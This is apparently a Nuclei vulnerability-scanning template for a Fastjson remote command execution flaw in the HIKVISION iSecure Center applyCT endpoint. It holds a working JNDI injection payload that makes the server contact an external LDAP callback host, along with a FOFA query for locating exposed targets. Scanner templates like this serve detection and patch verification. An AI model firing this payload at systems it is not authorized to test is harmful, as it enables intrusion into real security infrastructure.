id: hikvision-fastjson-rce

info:
  name: HIKVISION applyCT Fastjson - Remote Command Execution
  author: xc
  severity: critical
  description: |
    The HIKVISION comprehensive security management platform applyCT has a remote command execution vulnerability in a low version of Fastjson, through which an attacker can execute arbitrary commands to obtain server privileges
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="HIKVISION-iSecure-Center"
  tags: hikvision,fastjson,rce,oast

http:
  - raw:
      - |
        POST /bic/ssoService/v1/applyCT HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true},"hfe4zyyzldp":"="}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '"code":'
          - '"msg":'
        condition: and

      - type: word
        part: header
        words:
          - 'text/json'

# digest: 490a0046304402206f83cab6bc34e5b5675e8625a49613c10002d71f5de806e9997e88fddd878bd102206b415162afd9e079e0d74fe7dc92c836fdc871e7828680854e80c8203fdb2805:922c64590222798bb761d5b6d8e72950
